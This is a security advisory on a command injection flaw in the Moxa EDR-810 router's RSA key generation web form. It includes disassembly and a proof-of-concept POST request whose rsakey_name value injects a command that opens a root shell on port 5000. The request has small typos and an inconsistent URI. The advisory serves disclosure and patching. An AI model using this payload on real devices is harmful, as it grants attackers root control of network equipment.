Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability

Summary

An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the rsakey_name= parm in the “/goform/WebRSAKEYGen” uri to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

<https://www.moxa.com/product/EDR-810.htm&gt;

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

Details

Once logged in to the device’s web interface, a user can generate RSA key via a POST to “/goform/net_WebRSAKEYGen”. One of the parameters that gets sent with this post request is the rsakey_name= parameter. An attacker can inject OS commands to get a root shell.

Vulnerable URI: /goform/net_WebRSAKEYGen Vulnerable Parameter: rsakey_name=

STR             R3, [R11,#var_8]
LDR             R0, [R11,#var_158]
LDR             R1, =aRsakey_name ; "rsakey_name"
LDR             R2, =unk_163A3C
BL              sub_25B6C
MOV             R3, R0
...
SUB             R3, R11, #-s
MOV             R0, R3  ; command
BL              system	

Exploit Proof-of-Concept

The following POST will start a root shell on port 5000.

POST: /goform/net\_WebRSAKEYGen HTTP/1.1
Host: DeviceIP
Cooke: Valid-Cookie
Content-Type: japplication/x-www-form-urlencoded

rsakey_name=`tcpsvd 0 5000 /bin/bash`#

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release